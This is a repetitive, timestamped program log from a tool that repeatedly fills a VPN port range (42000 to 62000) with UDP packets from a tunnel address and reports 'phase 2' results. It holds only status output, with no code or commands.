+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:23:05 +Starting port fill at 2020-09-06 14:24:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:24:05 +Starting port fill at 2020-09-06 14:25:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 14:25:06 +Starting port fill at 2020-09-06 14:26:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:26:06 +Starting port fill at 2020-09-06 14:27:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:27:05 +Starting port fill at 2020-09-06 14:28:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:28:05 +Starting port fill at 2020-09-06 14:29:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:29:04 +Starting port fill at 2020-09-06 14:30:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:30:04 +Starting port fill at 2020-09-06 14:31:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:31:04 +Starting port fill at 2020-09-06 14:32:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:32:04 +Starting port fill at 2020-09-06 14:33:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 14:33:07 +Starting port fill at 2020-09-06 14:34:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:34:04 +Starting port fill at 2020-09-06 14:35:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:35:05 +Starting port fill at 2020-09-06 14:36:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:36:05 +Starting port fill at 2020-09-06 14:37:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:37:06 +Starting port fill at 2020-09-06 14:38:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:38:05 +Starting port fill at 2020-09-06 14:39:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 14:39:07 +Starting port fill at 2020-09-06 14:40:02 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:40:05 +Starting port fill at 2020-09-06 14:41:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:41:05 +Starting port fill at 2020-09-06 14:42:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:42:04 +Starting port fill at 2020-09-06 14:43:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:43:04 +Starting port fill at 2020-09-06 14:44:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:44:04 +Starting port fill at 2020-09-06 14:45:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:45:05 +Starting port fill at 2020-09-06 14:46:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:46:04 